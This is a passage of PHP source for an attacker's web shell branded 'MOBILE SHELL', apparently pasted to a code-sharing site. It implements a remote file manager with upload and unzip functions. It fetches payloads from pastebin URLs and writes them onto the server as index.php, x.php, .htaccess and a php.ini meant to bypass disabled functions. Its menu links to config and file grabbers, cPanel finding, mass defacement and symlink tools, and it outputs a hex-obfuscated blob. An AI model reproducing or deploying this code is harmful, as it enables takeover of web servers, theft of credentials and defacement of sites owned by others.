  1573. <a class='a' href='?command=renadir&dir=$dir/$dirx'>R</a> | <a class='a' href='?command=deledir&dir=$dir/$dirx'>D</a>";
  1574.                 $ckh = '<input type="checkbox" value="'.basename($dirx).'" name="msv5[]">';
  1575.             }
  1576.  echo "<tr class='ex-hov'>";
  1577.             echo "<td class='td-file break'><i class='fa fa-folder-o'></i>&nbsp; [ $href
  1578. ]</td>";
  1579.     echo "<td align='center' class='td-file'><center>&mdash;&mdash;</center></th>";
  1580.     echo "<td align='center' class='td-file'>$d_zx</td>";
  1581.     echo "<td align='center' class='td-file' style='width:10px'>".$ckh."</td>";
  1582.         }
  1583.         echo "</tr>";
  1584. foreach($scn as $file) {
  1585.             $ftype = filetype("$dir/$file");
  1586.             $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  1587.             $size = filesize("$dir/$file")/1024;
  1588.             $size = round($size,3);
  1589.             if($size > 1024) {
  1590.                 $size = round($size/1024,2). 'MB';
  1591.             } else {
  1592.                 $size = $size. 'KB';
  1593.             }
  1594.             if(!is_file("$dir/$file")) continue;
  1595.             echo "<tr class='ex-hov'>";
  1596.             echo '<td class=\'td-file break\'><i class="fa fa-file-o"></i>&nbsp; <a class="a" href="?'.x7.'view&'.x5.$dir.'&'.x6.$dir.'/'.$file.'">'.$file.'</a></td>';
  1597.             echo "<td align='center' class='td-file'>$size</td>";
  1598.             echo "<td align='center' class='td-file'>";
  1599.             echo '<a class="a" href="?command=edit&dir='.$dir.'&file='.$dir.'/'.$file.'">OPEN</a></td>';
  1600.             echo "<td align='center' class='td-file' style='width:10px'><input type='checkbox' name='msv5[]' value='".$file."'> </td>";
  1601. }
  1602.     echo "</table><table style='width:100%;margin-top:2px' cellspacing='0'>
  1603. <td style='width:10%;text-align:left;padding-left:7px'><input type=checkbox onClick=toggle(this)></td>
  1604.    <input type=hidden name=ne value=''>
  1605.    <input type=hidden name=location value='" . htmlspecialchars($GLOBALS['cwd']) . "'>
  1606.    <input type=hidden name=charset value='". (isset($_COEG['charset'])?$_COEG['charset']:'')."'>
  1607.    <td style='width:70%'><select name='hcx' style='width:100%' id='act'>";
  1608.  if(!empty($_COOKIE['act']) && @count($_COOKIE['msv5']))
  1609.     echo("<option value='paste'>Paste</option>");
  1610.     echo("<option value=''>&mdash;&mdash; Select Action &mdash;&mdash;</option><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>");
  1611. if(class_exists('ZipArchive'))
  1612.     echo("<option value='zip'>Compress (.zip)</option>");
  1613.     echo("</select></td>");
  1614.     if(!empty($_COOKIE['act']) && @count($_COOKIE['msv5']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar')))
  1615.     echo("<input class='top' type=text name=p2 value='".rand(0,100)."-" . date("Y-m-d") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'>");
  1616.     echo "<td style='width:20%;text-align:right'><input type='submit' onclick='m1s(); return false;' value='GO' class='btn-exe'></td></form></table>";
  1617.     if(isset($_COEG['ndir'])) {
  1618.     $cdir = $_COEG['newinput'];
  1619.     if (is_dir($dir.'/'.$cdir)) {
  1620. $q1 = 'Directory Already Exist !!';
  1621. echo failed1($q1);
  1622.     } else {
  1623.         if(mkdir($dir.'/'.$cdir, 0777)) {
  1624. $q1 = 'Directory Created ^_^';
  1625. echo success1($q1);
  1626.            echo "<meta http-equiv='Refresh' content='0; URL=?dir=".$dir."'/>";
  1627.         } else {
  1628. $q1 = 'Can\'t Create Directory !!';
  1629. echo failed1($q1);  } } }
  1630. if(isset($_COEG['nfil'])) {
  1631.     $cfile = $_COEG['newinput'];
  1632.     if (file_exists($dir.'/'.$cfile)) {
  1633. $q1 = "File Already Exist !!";
  1634. echo failed1($q1);
  1635.     } else {
  1636.         if(fopen($dir.'/'.$cfile, "w+")) {
  1637.      echo "<meta http-equiv='Refresh' content='0; URL=?command=edit&dir=".$dir."&file=".$dir."/".$cfile."'/>";
  1638.         } else {
  1639. $q1 = 'Can\'t Create File !!';
  1640. echo failed1($q1);
  1641.         }
  1642.     }
  1643. }
  1644. echo('<script language="Javascript">
  1645.         function cog(){
  1646. if(document.forms[\'new\'].newinput.value === "") { $.alert({
  1647.     icon: "fa fa-code",
  1648.     title: "MOBILE SHELL",
  1649.     content: "Can\'t Be Empty !!",
  1650.     theme: "Dark",
  1651.     type: "red",
  1652.     });
  1653.    return false;
  1654.     }
  1655. }
  1656. </script>');
  1657. echo('<script type="text/javascript">
  1658. function valid(field) {
  1659.        var re = /^[0-9-A-z.]*$/;
  1660.        if (!re.test(field.value)) {');
  1661.             $s = "Invalid Name !!";
  1662.             echo failed2($s);
  1663.             echo('field.value = field.value.replace(/[^0-9-A-z.]/g,"");
  1664.        }
  1665.    }
  1666. </script>');
  1667. echo('<table style="margin-top:3px" cellspacing="0"><form name="new" action="?'.x5.$dir.'" method="post">
  1668.     <td>
  1669. <input type="text" name="newinput" onkeyup="valid(this);"></td>
  1670. <td><input type="submit" class="btn-exe" name="ndir" onclick="return cog();" value="ND"></td>
  1671. <td><input type="submit" class="btn-exe" name="nfil" onclick="return cog();" value="NF"></td></form></table>');
  1672.  }
  1673.  
  1674.  echo '<hr></div>';
  1675. echo '<div class="coR">
  1676.         <div class="coR-panel"><table>
  1677. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">TOOLS</td></table></div>
  1678. <div class="tools-content" style="padding:5px">';
  1679. $path = getcwd();
  1680. if(isset($_FILES['data'])) {
  1681. if(copy($_FILES['data']['tmp_name'],$path.'/'.$_FILES['data']['name'])) {
  1682.     $q1 = 'File Uploaded !!';
  1683.     $t1 = '?'.x5.$dir;
  1684.     fauto2($q1, $t1);
  1685. } else {
  1686.     $q1 = 'Upload Failed !!';
  1687.     failed1($q1);
  1688.     }
  1689. }
  1690. echo '<script>function upload(){
  1691. if(document.getElementById("up").value == ""){
  1692.      $.alert ({
  1693.         icon: "fa fa-code",
  1694.         title: "MOBILE SHELL",
  1695.         content: "Select Your File !!",
  1696.         theme: "Dark",
  1697.         type: "red",
  1698.         });
  1699.      return false;
  1700.    }
  1701.    document.getElementById("%").submit();
  1702.  }
  1703. </script>';
  1704. echo '<table><td align="center" style="width:10%"><i class="fa fa-bookmark-o"></i></td><td style="width:70%"><form enctype="multipart/form-data" action="?'.x5.$dir.'" method="POST"><input type="file" name="data" id="up"></td><td style="width:20%"><button type="submit" class="btn-exe" onclick="upload();return false;"><i class="fa fa-arrow-circle-right"></i></button></form></td></table>';
  1705. echo '<hr>';
  1706. if(isset($_COEG['x'])) {
  1707. $rse = $_COEG['file_name'];
  1708. $zip = new ZipArchive ;
  1709. if($zip ->open($path.'/'.$rse) === TRUE) {
  1710. $zip ->extractTo($path);
  1711. $zip ->close();
  1712.     $q1 = '[ '.$rse.' ] Extracted !!';
  1713.     $t1 = '?'.x5.$dir;
  1714.     fauto2($q1, $t1);
  1715. } else {
  1716.     $q1 = 'Permission Denied !!';
  1717.     failed1($q1);
  1718.     }
  1719. }
  1720. echo '<script>function unzip(){
  1721. if(document.getElementById("u").value == ""){
  1722.      $.alert ({
  1723.         icon: "fa fa-code",
  1724.         title: "MOBILE SHELL",
  1725.         content: "Select Archive File [ .zip] !!",
  1726.         theme: "Dark",
  1727.         type: "red",
  1728.         });
  1729.      return false;
  1730.    }
  1731.    document.getElementById("sks").submit();
  1732.  }
  1733. </script>';
  1734. echo '<table>
  1735. <form method="POST" action="?'.x5.$dir.'">
  1736. <td align="center" style="width:10%"><i class="fa fa-bookmark-o"></i></td>
  1737. <td style="width:70%"><select name="file_name" id="u">
  1738. <option value=""> &mdash;&mdash; Choose File &mdash;&mdash;</option>';
  1739. $scandir = scandir($path);
  1740. foreach($scandir as $file){
  1741. if(!is_file("$path/$file")) continue;
  1742. if(preg_match('/\.zip$/mis',$file)) {
  1743. echo '<option>'.$file.'</option>';
  1744.     }
  1745. }
  1746. echo '</select></td><td style="width:20%;text-align:right"><button type="submit" name="x" class="btn-exe" onclick="unzip();return false;"><i class="fa fa-arrow-circle-right"></i></button></form></td></table>';
  1747.  
  1748. if($_COEG['ms_cr']=="0") {
  1749.     $alert = 'What Are You Doing Men ?';
  1750.     failed1($alert);
  1751. }
  1752. if($_COEG['ms_cr']=="1") {
  1753. $rz = 'https://pastebin.com/raw/bC5Yx72V';
  1754. $x = file_get_contents($rz);
  1755. if(empty($x)) {
  1756. $q1 = 'Can\'t Create File !!';
  1757. failed1($q1); } else {
  1758. $q1 = 'File Created !!';
  1759. $t1 = '?'.x5.$dir;
  1760. $t1 = '?'.x5.$dir;
  1761. fauto2($q1, $t1);
  1762. $fp = fopen($dir."/index.php", "w");
  1763. fwrite($fp, $x);
  1764. fclose($fp);
  1765.     }
  1766. }
  1767. if($_COEG['ms_cr']=="2") {
  1768. $rz = 'http://pastebin.com/raw/156wCF33';
  1769. $x = file_get_contents($rz);
  1770. if(empty($x)) {
  1771. $q1 = 'Can\'t Create File !!';
  1772. failed1($q1); } else {
  1773. $q1 = 'File Created !!';
  1774. $t1 = '?'.x5.$dir;
  1775. fauto2($q1, $t1);
  1776. fauto2($q1, $t1);
  1777. $fp = fopen($dir."/x.php", "w");
  1778. fwrite($fp, $x);
  1779. fclose($fp);
  1780.     }
  1781. }  
  1782. if($_COEG['ms_cr']=="3") {
  1783. $rz = x4.'/adminer.txt';
  1784. $x = file_get_contents($rz);
  1785. if(empty($x)) {
  1786. $q1 = 'Can\'t Create File !!';
  1787. failed1($q1); } else {
  1788. $q1 = 'File Created !!';
  1789. $t1 = '?'.x5.$dir;
  1790. fauto2($q1, $t1);
  1791. $fp = fopen($dir."/adminer.php", "w");
  1792. fwrite($fp, $x);
  1793. fclose($fp);
  1794.     }
  1795. }  
  1796. if($_COEG['ms_cr']=="4") {
  1797. $rz = 'http://pastebin.com/raw/fRyCn3bQ';
  1798. $x = file_get_contents($rz);
  1799. if(empty($x)) {
  1800. $q1 = 'Can\'t Create File !!';
  1801. failed1($q1); } else {
  1802. $q1 = 'File Created !!';
  1803. $t1 = '?'.x5.$dir;
  1804. fauto2($q1, $t1);
  1805. $fp = fopen($dir."/.htaccess", "w");
  1806. fwrite($fp, $x);
  1807. fclose($fp);
  1808.     }
  1809. }  
  1810. if($_COEG['ms_cr']=="5") {
  1811. $rz = 'http://pastebin.com/raw/gnbXUciS';
  1812. $x = file_get_contents($rz);
  1813. if(empty($x)) {
  1814. $q1 = 'Can\'t Create File !!';
  1815. failed1($q1); } else {
  1816. $q1 = 'File Created !!';
  1817. $t1 = '?'.x5.$dir;
  1818. fauto2($q1, $t1);
  1819. $fp = fopen($dir."/php.ini", "w");
  1820. fwrite($fp, $x);
  1821. fclose($fp);
  1822.     }
  1823. }  
  1824. echo '</div>';
  1825. echo('<div class="coR-panel top"><table>
  1826. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">MENU</td></table></div>
  1827. <div class="tools-content">');
  1828. echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">System Information</td><td class="td-tools-icon"><a href="?'.x7.'system&'.x5.$dir.'"><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
  1829. echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Multiple Upload</td><td class="td-tools-icon"><a href="?'.x7.'upload&'.x5.$dir.'"><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
  1830. echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Jumping Server</td><td class="td-tools-icon"><a href="?'.x7.'jumping&'.x5.$dir.'"><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
  1831. echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Config Grabber</td><td class="td-tools-icon"><a href="?'.x7.'config&'.x5.$dir.'"><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
  1832. echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">File Grabber</td><td class="td-tools-icon"><a href="?'.x7.'filegrab&'.x5.$dir.'"><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
  1833. echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Cpanel Finder</td><td class="td-tools-icon"><a href="?'.x7.'cpanel&'.x5.$dir.'"><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
  1834. echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Mass Deface</td><td class="td-tools-icon"><a href="?'.x7.'massdef&'.x5.$dir.'"><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
  1835. echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">MD5 Creator</td><td class="td-tools-icon"><a href="?'.x7.'md5&'.x5.$dir.'"><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
  1836. echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Multi Symlink</td><td class="td-tools-icon"><a href="?'.x7.'symlink&'.x5.$dir.'"><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
  1837. echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Change Password</td><td class="td-tools-icon"><a href="?'.x7.'change&'.x5.$dir.'"><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
  1838. echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Me : [ <font color="#1D9D73">'.str_replace('/', '', basename($_SERVER['PHP_SELF'])).' </font> ]</td><td class="td-tools-icon"><a href="?'.x7.'kill&'.x5.$dir.'"><button class="btn-exe"><i class="fa fa-trash"></i></button></a></td></table>');
  1839. echo('</div>');
  1840. echo(x("\x4e\x30\x68\x67\x63\x31\x62\x77\x4d\x79\x32\x4b\x4d\x7a\x33\x69\x63\x63\x4f\x77\x39\x39\x5a\x62\x52\x54\x76\x4c\x54\x6f\x38\x72\x30\x58\x54\x6a\x7a\x75\x6d\x56\x50\x5a\x55\x74\x70\x46\x6c\x6d\x47\x75\x58\x59\x2f\x51\x50\x7a\x57\x77\x37\x4f\x66\x2f\x32\x61\x4a\x32\x42\x6a\x31\x47\x64\x70\x78\x38\x4c\x4e\x4e\x48\x64\x68\x48\x50\x44\x6d\x67\x50\x6f\x41\x65\x50\x39\x6e\x37\x67\x30\x44\x64\x79\x78\x5a\x39\x62\x31\x36\x73\x63\x52\x63\x65\x4b\x2f\x41\x44\x74\x35\x36\x4c\x61\x46\x70\x69\x63\x38\x36\x44\x33\x41\x4b\x37\x42\x4b\x68\x4b\x4b\x4e\x32\x49\x37\x33\x39\x59\x75\x55\x69\x5a\x63\x49\x76\x66\x51\x41\x58\x4f\x77\x76\x37\x2f\x67\x58\x6a\x72\x4b\x2b\x2b\x75\x59\x6b\x6a\x7a\x46\x4c\x5a\x41\x67\x31\x44\x79\x6b\x61\x54\x43\x51\x4d\x41\x43\x38\x68\x30\x61\x30\x44\x39\x50\x34\x4f\x6d\x56\x76\x49\x39\x54\x48\x68\x31\x37\x55\x62\x4c\x66\x61\x75\x44\x6b\x49\x66\x6e\x6f\x37\x49\x5a\x39\x57\x57\x78\x62\x42\x74\x6c\x6a\x38\x4b\x5a\x6e\x6d\x4b\x62\x38\x45\x6c\x6d\x4f\x66\x75\x66\x68\x54\x2f\x62\x6e\x32\x49\x6f\x6a\x61\x44\x63\x72\x34\x66\x7a\x70\x48\x6d\x57\x71\x48\x72\x74\x34\x35\x4c\x58\x43\x33\x49\x50\x49\x72\x59\x4b\x7a\x64\x38\x49\x31\x34\x6d\x62\x4d\x74\x43\x37\x56\x5a\x52\x4b\x5a\x77\x4f\x31\x5a\x5a\x46\x50\x43\x6f\x79\x75\x56\x5a\x76\x38\x6a\x47\x48\x45\x56\x45\x56\x4e\x62\x36\x30\x30\x39\x6c\x50\x6e\x4f\x4d\x52\x58\x66\x44\x2f\x79\x70\x66\x7a\x5a\x52\x37\x4e\x6c\x2b\x33\x6f\x65\x50\x66\x6d\x62\x50\x73\x73\x37\x2b\x73\x62\x6c\x2f\x77\x42\x58\x2b\x32\x70\x6c\x71\x74\x6c\x7a\x49\x50\x43\x78\x57\x49\x55\x56\x6b\x78\x69\x2b\x4e\x2f\x79\x70\x4f\x69\x45\x69\x38\x66\x4d\x42\x6d\x78\x53\x66\x43\x61\x72\x47\x73\x6e\x42\x59\x50\x44\x34\x6b\x4d\x4b\x7a\x4d\x32\x31\x42\x47\x6d\x51\x61\x7a\x6b\x54\x49\x78\x54\x7a\x38\x66\x6e\x75\x4d\x4a\x75\x70\x4f\x45\x5a\x71\x33\x47\x78\x6b\x61\x55"));
  1841. echo('<div class="tools-content top" style="padding:5px">');
  1842. echo('<table>
  1843. <form action="?'.x5.$dir.'" method="POST"><td align="center" style="width:10%"><i class="fa fa-bookmark-o"></span></td>
  1844. <td style="width:70%"><select name="ms_cr" id="c">');
  1845. echo('<option value=""> &mdash;&mdash; Choose File &mdash;&mdash;</option>');
  1846. echo('<option value="1">Create File [ index.php ]</option>');
  1847. echo('<option value="2">Create File [ x.php ]</option>');
  1848. echo('<option value="3">Adminer [ adminer.php ]</option>');
  1849. echo('<option value="4">Security [ .htaccess ]</option>');
  1850. echo('<option value="5">Bypass Disable [ php.ini ]</option>');
  1851. echo('</select></td>
  1852. <td style="width:20%;text-align:right"><button type="submit" class="btn-exe" onclick="create();return false;"><i class="fa fa-arrow-circle-right"></i></button></form></td></table>
  1853. </div></div></div>
  1854. </div></div></div><div class="co-ontainer"><div class="footer">CODED BY WILDAN IZZUDIN</div></div>');
  1855.  
  1856. echo('<script>
  1857. function ex(t) {
  1858.     var yx = window.navigator.vibrate(t);
  1859.       $.dialog ({
  1860.         icon: "fa fa-drupal",
  1861.         title: "MOBILE SHELL",
  1862.         content: "I am convinced that, because the criminal justice system is run by humans, it is naturally subject to human error. There is no rational basis to believe that this same type of <font color=\'#1D9D73\'>Human Error</font> will not infect capital murder trials.",
  1863.         animation: "Rotate",
  1864.         theme: "Dark",
  1865.             });
  1866.      }
  1867. </script>');
  1868. ?>
RAW Paste Data